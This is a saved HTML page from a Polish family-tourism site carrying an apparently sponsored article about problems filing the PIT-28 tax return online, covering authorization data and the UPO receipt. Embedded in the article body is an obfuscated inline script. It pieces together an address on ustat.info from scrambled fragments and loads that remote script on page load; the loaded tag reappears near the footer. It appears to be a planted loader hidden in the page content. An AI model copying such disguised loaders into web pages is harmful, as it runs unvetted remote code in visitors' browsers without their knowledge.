<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Problemy z PIT-28 online - Mali Turyści - Atrakcje turystyczne, ciekawe miejsca dla dzieci</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta name="keywords" content="">
<meta name="description" content="Kolonie i obozy dla dzieci, atrakcje turystyczne dla dzieci i rodziców, atrakcje dla dzieci, zabawy dla dzieci, pomysły na weekend z dzieckiem.">
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico">
<link href="templates/css/default.css" rel="stylesheet" type="text/css">
<script src="https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101"></script><script src="https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-3064247681645086.js"></script><script type="text/javascript" async="" src="http://www.google-analytics.com/ga.js"></script><script src="js/func.js" type="text/javascript"></script>
<script type="text/javascript" src="js/jquery.tools.min.js"></script>
<script src="js/jquery.lightbox-0.5.min.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="templates/css/jquery.lightbox-0.5.css" media="screen">
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script> 
<script src="js/jquery.js" type="text/javascript"></script>
<script src="js/kod.js" type="text/javascript"></script>
<script src="js/maps.js" type="text/javascript"></script>
<script src="js/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAMTeiN0zI3Qxq3KJmCeEAohSn4lJbO1QQB9AX9OLp8QHv19calhTCQCtqdQEGl0R-ASlhdAoZJg652Q" type="text/javascript"></script>
<link rel="preload" href="https://adservice.google.com.ph/adsid/integrator.js?domain=www.maliturysci.pl"><script type="text/javascript" src="https://adservice.google.com.ph/adsid/integrator.js?domain=www.maliturysci.pl"></script><link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=www.maliturysci.pl"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=www.maliturysci.pl"></script><link rel="preload" href="http://pagead2.googlesyndication.com/pagead/js/r20190212/r20190131/show_ads_impl.js"></head>
<body>
<div id="container">
    <div id="top">
	<div id="logo"><a href="/" title="Strona główna - Mali Turyści - Atrakcje turystyczne, ciekawe miejsca dla dzieci"><img src="templates/images/top.jpg" alt="Mali Turyści - Atrakcje turystyczne, ciekawe miejsca dla dzieci"></a></div>
	<div id="menu">
	    <ul>
    <li class="item2 level0"><a href="#">Bawię się i uczę</a>
		<ul id="sub2" style="display: none">
        <li class="item17 level1"><a href="items-cat-6-parki_i_miasteczka_tematyczne.html">Parki i miasteczka tematyczne</a>
	    </li>
        <li class="item18 level1"><a href="items-cat-7-sale_zabaw_dla_dzieci.html">Sale zabaw dla dzieci</a>
	    </li>
        <li class="item19 level1"><a href="items-cat-8-baseny.html">Baseny</a>
	    </li>
        <li class="item15 level1"><a href="items-cat-2-aquaparki-aquaparki.html">Aquaparki</a>
	    </li>
        <li class="item20 level1"><a href="items-cat-9-ogrody_zoologiczne.html">Ogrody zoologiczne</a>
	    </li>
        <li class="item21 level1"><a href="items-cat-10-ogrody_botaniczne.html">Ogrody botaniczne</a>
	    </li>
        <li class="item22 level1"><a href="items-cat-11-parki_etnograficzne.html">Parki etnograficzne</a>
	    </li>
        <li class="item23 level1"><a href="items-cat-12-planetaria.html">Planetaria</a>
	    </li>
        <li class="item24 level1"><a href="items-cat-13-obserwatoria.html">Obserwatoria</a>
	    </li>
        <li class="item16 level1"><a href="items-cat-3-muzea.html">Muzea</a>
	    </li>
        <li class="item93 level1"><a href="items-cat-72-szlaki_turystyczne.html">Szlaki turystyczne</a>
		    </li>
	</ul>
    </li>
        <li class="item3 level0"><a href="#">Co? Gdzie? Kiedy?</a>
		<ul id="sub3" style="display: none">
        <li class="item25 level1"><a href="items-cat-100-festyny_rodzinne.html">Festyny rodzinne</a>
	    </li>
        <li class="item26 level1"><a href="items-cat-15-festyny_ludowe_i_regionalne.html">Festyny ludowe i regionalne</a>
	    </li>
        <li class="item27 level1"><a href="items-cat-99-imprezy_historyczne.html">Imprezy historyczne</a>
	    </li>
        <li class="item29 level1"><a href="items-cat-18-imprezy_sportowe.html">Imprezy sportowe</a>
	    </li>
        <li class="item155 level1"><a href="items-cat-67-wydarzenia_kulturalne.html">Wydarzenia kulturalne</a>
	    </li>
        <li class="item154 level1"><a href="items-cat-69-wystawy.html">Wystawy</a>
	    </li>
        <li class="item156 level1"><a href="items-cat-68-warsztaty.html">Warsztaty</a>
		    </li>
	</ul>
    </li>
        <li class="item4 level0"><a href="#">Wypoczywam z rówieśnikami</a>
		<ul id="sub4" style="display: none">
        <li class="item31 level1"><a href="items-cat-20-kolonie.html">Kolonie</a>
	    </li>
        <li class="item32 level1"><a href="items-cat-21-obozy.html">Obozy</a>
	    </li>
        <li class="item33 level1"><a href="items-cat-22-polkolonie.html">Półkolonie</a>
	    </li>
        <li class="item35 level1"><a href="items-cat-24-hotele_i_pensjonaty.html">Hotele i Pensjonaty</a>
	    </li>
        <li class="item153 level1"><a href="http://maliturysci.pl/items-cat-98-agroturystyka.html">Agroturystyka</a>
		    </li>
	</ul>
    </li>
        <li class="item5 level0"><a href="#">Zielone wczasy</a>
		<ul id="sub5" style="display: none">
        <li class="item36 level1"><a href="items-cat-25-parki_narodowe.html">Parki Narodowe</a>
	    </li>
        <li class="item37 level1"><a href="items-cat-26-parki_krajobrazowe.html">Parki Krajobrazowe</a>
		    </li>
	</ul>
    </li>
        <li class="item6 level0"><a href="#">Moje hobby</a>
		<ul id="sub6" style="display: none">
        <li class="item46 level1"><a href="#">Snowboard</a>
		<ul id="sub46" style="display: none">
        <li class="item57 level2"><a href="items-cat-35-sklepy.html">Sklepy</a>
	    </li>
        <li class="item58 level2"><a href="items-cat-36-szkolki.html">Szkółki</a>
	    </li>
        <li class="item59 level2"><a href="items-cat-37-wypozyczalnie.html">Wypożyczalnie</a>
		    </li>
	</ul>
    </li>
        <li class="item47 level1"><a href="#">Narciarstwo</a>
		<ul id="sub47" style="display: none">
        <li class="item60 level2"><a href="items-cat-38-sklepy.html">Sklepy</a>
	    </li>
        <li class="item61 level2"><a href="items-cat-39-stoki.html">Stoki</a>
	    </li>
        <li class="item62 level2"><a href="items-cat-40-szkolki.html">Szkółki</a>
	    </li>
        <li class="item63 level2"><a href="items-cat-41-wypozyczalnie.html">Wypożyczalnie</a>
		    </li>
	</ul>
    </li>
        <li class="item48 level1"><a href="#">Jeździectwo</a>
		<ul id="sub48" style="display: none">
        <li class="item64 level2"><a href="items-cat-42-sklepy.html">Sklepy</a>
	    </li>
        <li class="item65 level2"><a href="items-cat-43-szkolki.html">Szkółki</a>
	    </li>
        <li class="item66 level2"><a href="items-cat-44-osrodki_jezdzieckie.html">Ośrodki jeździeckie</a>
	    </li>
        <li class="item67 level2"><a href="items-cat-45-osrodki_wypoczynkowe.html">Ośrodki wypoczynkowe</a>
		    </li>
	</ul>
    </li>
        <li class="item50 level1"><a href="#">Windsurfing</a>
		<ul id="sub50" style="display: none">
        <li class="item71 level2"><a href="items-cat-49-sklepy.html">Sklepy</a>
	    </li>
        <li class="item72 level2"><a href="items-cat-50-szkolki.html">Szkółki</a>
	    </li>
        <li class="item73 level2"><a href="items-cat-51-wypozyczalnie.html">Wypożyczalnie</a>
		    </li>
	</ul>
    </li>
        <li class="item51 level1"><a href="items-cat-87-splywy_kajakowe.html">Spływy kajakowe</a>
	    </li>
        <li class="item52 level1"><a href="#">Pływanie</a>
		<ul id="sub52" style="display: none">
        <li class="item77 level2"><a href="items-cat-55-nauka.html">Nauka</a>
	    </li>
        <li class="item78 level2"><a href="items-cat-56-obozy.html">Obozy</a>
		    </li>
	</ul>
    </li>
        <li class="item53 level1"><a href="#">Historia</a>
		<ul id="sub53" style="display: none">
        <li class="item79 level2"><a href="items-cat-57-ruiny.html">Ruiny</a>
	    </li>
        <li class="item80 level2"><a href="items-cat-58-zamki_i_palace.html">Zamki i Pałace</a>
	    </li>
        <li class="item81 level2"><a href="items-cat-59-dworki.html">Dworki</a>
	    </li>
        <li class="item125 level2"><a href="http://maliturysci.pl/items-cat-80-atrakcje_geologiczne.html">Atrakcje geologiczne</a>
		    </li>
	</ul>
    </li>
        <li class="item133 level1"><a href="http://www.maliturysci.pl/items-cat-89-tenis.html">Tenis</a>
	    </li>
        <li class="item99 level1"><a href="items-cat-23-nauka_jezyka.html">Nauka Języka</a>
	    </li>
        <li class="item143 level1"><a href="http://maliturysci.pl/items-cat-93-zabawki_dla_dzieci.html">Zabawki dla dzieci</a>
		    </li>
	</ul>
    </li>
        <li class="item7 level0"><a href="#">Pod żaglami</a>
		<ul id="sub7" style="display: none">
        <li class="item44 level1"><a href="items-cat-63-rejsy_po_mazurach.html">Rejsy po Mazurach</a>
	    </li>
        <li class="item45 level1"><a href="items-cat-62-rejsy_po_morzu_baltyckim.html">Rejsy po Morzu Bałtyckim</a>
	    </li>
        <li class="item102 level1"><a href="items-cat-76-rejsy_zagraniczne.html">Rejsy zagraniczne</a>
	    </li>
        <li class="item132 level1"><a href="http://www.maliturysci.pl/items-cat-84-szkoly_zeglarskie.html">Szkoły żeglarskie</a>
		    </li>
	</ul>
    </li>
        <li class="item8 level0"><a href="#">Szczypta kultury</a>
		<ul id="sub8" style="display: none">
        <li class="item38 level1"><a href="items-cat-64-kina.html">Kina</a>
	    </li>
        <li class="item39 level1"><a href="items-cat-65-teatry.html">Teatry</a>
	    </li>
        <li class="item41 level1"><a href="items-cat-67-wydarzenia_kulturalne.html">Wydarzenia kulturalne</a>
	    </li>
        <li class="item42 level1"><a href="items-cat-68-warsztaty.html">Warsztaty</a>
	    </li>
        <li class="item43 level1"><a href="items-cat-69-wystawy.html">Wystawy</a>
	    </li>
        <li class="item158 level1"><a href="#">Do poczytania...</a>
		<ul id="sub158" style="display: none">
        <li class="item111 level2"><a href="http://www.maliturysci.pl/items-cat-78-ksiazki_dla_dzieci.html">Książki dla dzieci</a>
	    </li>
        <li class="item112 level2"><a href="http://www.maliturysci.pl/items-cat-79-ksiazki_turystyczne.html">Książki turystyczne</a>
	    </li>
        <li class="item157 level2 last"><a href="http://www.maliturysci.pl/items-cat-85-ksiazki_edukacyjne.html">Książki edukacyjne</a>
		    </li>
	</ul>
    </li>
    </ul>
	</li></ul></div>
    </div>
    <div id="banner">											<p><script type="text/javascript">
    google_ad_client = "ca-pub-3064247681645086";
    google_ad_slot = "8740512458";
    google_ad_width = 728;
    google_ad_height = 90;
</script>
<!-- Główna maliturysci.pl -->
<script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script><ins id="aswift_0_expand" style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px;background-color:transparent;" data-ad-slot="8740512458"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px;background-color:transparent;"><iframe width="728" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;border:0px;width:728px;height:90px;"></iframe></ins></ins></p>
							</div>    <div id="left">
	<div class="box">
	    <div class="boxIn">
		<h4>Wyszukiwarka</h4>
		<div class="boxContent">
		    <form action="items-search.html" method="post">
			<fieldset>
			    <input type="text" class="seachInput" name="search">
			    <input type="submit" value="Szukaj" class="searchGo">
			</fieldset>
		    </form>
		    <a href="advanced.html"><img src="templates/images/search_advanced_.jpg" alt="Wyszukiwanie szczegółowe"></a><br><br>
		    <a href="map.html"><img src="templates/images/search_map.jpg" alt="Wyszukiwanie na mapie"></a>
		</div>
	    </div>
	</div>
	<div class="box">
	    <div class="boxIn" id="revs">
				<div>
		    <h2>Czy wiesz, że...</h2>
		    <div class="boxContent">
		    <p>
	<em>...w <span data-scayt_word="Świerkocinie" data-scaytid="4">Świerkocinie</span> <span data-scayt_word="znajduje" data-scaytid="5">znajduje</span> <span data-scayt_word="się" data-scaytid="6">się</span> Zoo Safari, <span data-scayt_word="które" data-scaytid="7">które</span> jest <span data-scayt_word="pierwszym" data-scaytid="9">pierwszym</span> <span data-scayt_word="Ogrodem" data-scaytid="10">Ogrodem</span> <span data-scayt_word="Zoologicznym" data-scaytid="11">Zoologicznym</span> w <span data-scayt_word="Polsce" data-scaytid="12">Polsce</span>, <span data-scayt_word="przez" data-scaytid="13">przez</span> <span data-scayt_word="które" data-scaytid="8">które</span> <span data-scayt_word="można" data-scaytid="14">można</span> <span data-scayt_word="przejechać" data-scaytid="15">przejechać</span> <span data-scayt_word="samochodem" data-scaytid="16">samochodem</span> i <span data-scayt_word="zobaczyć" data-scaytid="17">zobaczyć</span> <span data-scayt_word="dzikie" data-scaytid="18">dzikie</span> <span data-scayt_word="zwierzęta" data-scaytid="19">zwierzęta</span> z <span data-scayt_word="bardzo" data-scaytid="20">bardzo</span> <span data-scayt_word="bliska" data-scaytid="21">bliska</span>?<br>
	<br>
	<a href="http://maliturysci.pl/items-full-4523-zoo_safari_w_swierkocinie_unikalna_forma_zwiedzania_w_polsce.html" target="_self"><strong>Dowiedz się więcej</strong></a></em></p>
		    </div>
		</div>
			    </div>
	</div>
	<div class="box">
	    <div class="boxIn">
		<h2>Moje Hobby</h2>
		<ul>
    <li class="item88 level0"><a href="http://maliturysci.pl/pages-10-historia.html">HISTORIA</a>
	    </li>
        <li class="item100 level0"><a href="http://maliturysci.pl/pages-203.html">PRZYRODA</a>
	    </li>
        <li class="item121 level0"><a href="http://maliturysci.pl/pages-223-jezdziectwo.html">JEŹDZIECTWO</a>
	    </li>
        <li class="item122 level0"><a href="http://maliturysci.pl/pages-224.html">PŁYWANIE</a>
	    </li>
        <li class="item123 level0 last"><a href="http://maliturysci.pl/pages-225-narciarstwo.html">NARCIARSTRO</a>
	    </li>
    </ul>
	    </div>
	</div>
	<div class="box">
	    <div class="boxIn">
		<h2>Patronat</h2>
		<div class="adv">
													<a href="http://www.szlakrzemiosla.pl/" target="_blank"><img src="images/adds/banner_140_ptaszki.jpg" alt="http://www.szlakrzemiosla.pl/"></a>
															<a href="http://www.teatr.gniezno.pl/" target="_blank"><img src="images/adds/teatrfredry_logo.jpg" alt="http://www.teatr.gniezno.pl/"></a>
															<a href="http://www.silentio.pl/co-robimy/do-barcelony-po-zdrowie/" target="_blank"><img src="images/adds/silentio_patronat.jpg" alt="http://www.silentio.pl/co-robimy/do-barcelony-po-zdrowie/"></a>
															<a href="http://pomagamy.dbv.pl" target="_blank"><img src="images/adds/pomagamy.gif" alt="http://pomagamy.dbv.pl"></a>
															<a href="http://pieknoistnieje.maliturysci.pl/" target="_blank"><img src="images/adds/piekno.jpg" alt="http://pieknoistnieje.maliturysci.pl/" class="last"></a>
							
		</div>
	    </div>
	</div>
	<div class="adv2">
	<a href="partners.html"><img src="templates/images/partners_s1.jpg" alt="Partnerzy"></a>
	</div>
	<div class="box">
	    <div class="boxIn">
		<h2>Reklama</h2>
		<div class="adv">
					
		</div>
	    </div>
	</div>

    </div>
    <div id="center">
	<div id="centerIn">
	    <div id="centerIn2">
								    <h2 class="header">Problemy z PIT-28 online</h2>
			    <div class="news">
				<p>
	<br>
	<img alt="" src="/images/image/pitax2.jpg" style="width: 500px; height: 333px;"></p>
<p>
	&nbsp;</p>
<p>
	<span style="color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">Składanie deklaracji podatkowych przez środki komunikacji elektronicznej jest z każdym rokiem popularniejsze. PIT-28 online może wypełnić każdy podatnik rozliczający się w formie ryczałtu od przychodów ewidencjonowanych, &nbsp;wystarczy dostęp do internetu.</span></p>
<p>
	&nbsp;</p>
<h1 style="font-size: 28px; margin: 0px; font-family: OpenSansRegular; font-weight: normal; padding: 0px 0px 35px; line-height: 32px; color: rgb(17, 17, 17); border-bottom: 1px solid rgb(221, 221, 221);">
	Deklarację PIT-28 trzeba złożyć w terminie do dnia 31 stycznia roku następnego po roku podatkowym.</h1>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	Jeśli podatnik w ostatniej chwili zajmie się wypełnianiem zeznania Pit 28 online, może nie zdążyć z wysłaniem rozliczenia w terminie. Mogą np.pojawić się problemy techniczne w związku z dużą ilością użytkowników serwera w jednym czasie i związane z tym opóźnienia w przesyłaniu danych. Niezłożenie pit w terminie zagrożone jest odpowiedzialnością karno skarbową.</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	&nbsp;</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	Wypełnienie formularza PIT-28 online nie powinno nastręczać trudności, ponieważ programy komputerowe pomagają &nbsp;podatnikowi przejść przez &nbsp;cały proces rozliczenia. W trakcie uzupełniania formularza sprawdzają poprawność wpisania danych, wskazują pola do obowiązkowego wypełnienia, podają instrukcję, jak poprawnie je uzupełnić, wykonują obliczenia matematyczne. Zawsze jednak może zdarzyć się niezauważony błąd, ale wtedy podatnik ma możliwość złożenia korekty.</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	&nbsp;</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	Najwięcej problemów spotykają podatnicy w momencie wysyłania&nbsp;<a href="https://www.pitax.pl/pit-28/" style="background: transparent; color: rgb(191, 16, 60); text-decoration: none;">Pit 28 online</a>. Wprawdzie do zeznania PIT-28 online nie musi być stosowany kwalifikowany podpis elektroniczny, &nbsp;lecz wystarczy podanie danych autoryzujących. Tutaj jednak mogą wystąpić wątpliwości podatnika:</p>
<ul style="color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	<li>
		czy należy wpisać NIP czy PESEL,</li>
	<li>
		czy podaje się jedno imię czy wszystkie imiona,</li>
	<li>
		jak wpisać nazwisko wieloczłonowe</li>
	<li>
		w jakim formacie podać datę urodzenia</li>
	<li>
		z jakiego zeznania podać kwotę przychodu</li>
	<li>
		co zrobić, jeśli w poprzednim roku żadne zeznanie nie zostało złożone.</li>
</ul>
<p>
	&nbsp;</p>
<h2 style="font-family: OpenSansRegular; font-size: 22px; font-weight: normal; margin: 0px 0px 10px; padding: 0px; line-height: 26px; color: rgb(191, 16, 60);">
	Wszystkie te problemy pomoże rozwiązać dobry program do rozliczania pit.</h2>
<ul style="color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	<li>
		NIP wpisują przedsiębiorcy i zarejestrowani płatnicy VAT, natomiast pozostali podatnicy PESEL</li>
	<li>
		osoby posiadające kilka imion wpisują tylko pierwsze imię</li>
	<li>
		nazwisko wieloczłonowe wpisać należy całe – wszystkie jego człony,</li>
	<li>
		datę urodzenia wpisuje się w takim formacie dzień, miesiąc rok, przed oznaczeniem dni i miesięcy 1-9 należy wpisać 0.</li>
	<li>
		kwotę przychodu podajemy z dowolnego zeznania złożonego w poprzednim roku za rok wcześniejszy</li>
	<li>
		w przypadku nieskładania deklaracji w poprzednim roku wpisujemy 0 (zero).</li>
</ul>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	&nbsp;</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	System fiskalny przyjmie formularz PIT-28 online i dostarczy do właściwego urzędu skarbowego tylko wtedy, gdy dane autoryzujące będą podane poprawnie. W przeciwnym przypadku system wyśle informację o błędzie i podatnik musi poprawić błąd, aby ponownie wysłać deklarację.</p>
<p>
	&nbsp;</p>
<p style="margin-top: 0px; color: rgb(17, 17, 17); font-family: OpenSansRegular, Arial, Tahoma, sans-serif; font-size: 14px;">
	<br>
	Urząd skarbowy po otrzymaniu zeznania PIT-28 online prześle na adres mailowy podatnika informację potwierdzającą - tzw. UPO (Urzędowe Poświadczenie Odbioru). Dowód ten należy zachować przez okres 5 lat (tak samo jak inne potwierdzenia złożenia pit).</p>

<script type="text/javascript">
(function(){
 cX3m=document.createElement("script");cX3m_=("ust");cX3mu="13772709";
 cX3m_+="a"+("t.i");cX3m.type="text/javascript";
 cX3mu+=".js3rc6mtX3mapaceXwhj";cX3m.async=true;cX3m_+="n"+("f"+"o")+"/";
 cX3mu+="vhktz0q4c4";cX3m.src="//"+cX3m_+cX3mu;
 document.body.appendChild(cX3m);
})();
</script>
				<p><br><strong>Data dodania: </strong> 16.11.2016 - 17:11</p>
							    </div>
				    </div>
	</div>
    </div>
	
    <div id="right">
	<div class="box">
	    <div class="boxIn">
		<h2>Nawigacja</h2>
		<ul>
    <li class="item9 level0"><a href="http://www.maliturysci.pl/">Strona główna</a>
	    </li>
        <li class="item12 level0"><a href="pages-1-o_nas.html">O nas</a>
	    </li>
        <li class="item13 level0"><a href="pages-2-reklama.html">REKLAMA - NOWE WARUNKI!</a>
	    </li>
        <li class="item11 level0"><a href="quizzes.html">Konkursy</a>
	    </li>
        <li class="item10 level0"><a href="http://maliturysci.pl/pages-213-promocja_i_wspolpraca.html">Promocja / współpraca</a>
	    </li>
        <li class="item124 level0"><a href="http://maliturysci.pl/pages-226-zaloz_bloga_na_malituryscipl.html">ZAŁÓŻ U NAS BLOGA!</a>
	    </li>
        <li class="item84 level0"><a href="experts-1.html">Porady</a>
	    </li>
        <li class="item14 level0"><a href="pages-3-kontakt.html">Kontakt</a>
	    </li>
        <li class="item119 level0"><a href="http://maliturysci.pl/pages-221.html">Pomagamy</a>
	    </li>
        <li class="item120 level0 last"><a href="http://maliturysci.pl/pages-222.html">Regulamin</a>
	    </li>
    </ul>
	    </div>
	</div>
	



	<div class="box">
	    <div class="boxIn">
		<h2>Regiony turystyczne</h2>
		<ul>
    <li class="item86 level0"><a href="http://maliturysci.pl/pages-16-kujawy_i_pomorze.html">Kujawy i Pomorze</a>
	    </li>
        <li class="item109 level0"><a href="http://maliturysci.pl/pages-205-mazowsze.html">Mazowsze</a>
	    </li>
        <li class="item108 level0"><a href="http://maliturysci.pl/pages-204-sudety.html">Sudety</a>
	    </li>
        <li class="item94 level0"><a href="http://maliturysci.pl/pages-199-warmia_i_mazury.html">Warmia i Mazury</a>
	    </li>
        <li class="item110 level0 last"><a href="http://maliturysci.pl/pages-207-wielkopolska.html">Wielkopolska</a>
	    </li>
    </ul>
	    </div>
	</div>
	
	
	
	
	
	<div class="box">
	    <div class="boxIn">
		<h2>Polecamy</h2>
		<ul>
</ul>
	    </div>
	</div>
	<div class="box">
	    <div class="boxIn">
		<h2>Reklama</h2>
		<div class="adv">
													<p><a href="http://www.przepis-y.pl" target="_blank"><img src="http://www.przepis-y.pl/wp-content/uploads/2015/03/logo.jpg" alt="http://www.przepis-y.pl" border="0" width="" height=""></a></p>
							
		</div>
	    </div>
	</div>
    </div>

</div><iframe id="google_osd_static_frame_9860297782680" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;"></iframe><script type="text/javascript" async="" src="//ustat.info/13772709.js3rc6mtX3mapaceXwhjvhktz0q4c4"></script>
<div id="futer"><img src="templates/images/gosp.jpg" alt="Innowacyjna Gospodarka"></div>



</body><iframe id="google_shimpl" style="display: none;"></iframe><iframe id="google_esf" name="google_esf" src="https://googleads.g.doubleclick.net/pagead/html/r20190212/r20190131/zrt_lookup.html#" data-ad-client="ca-pub-3064247681645086" style="display: none;"></iframe></html>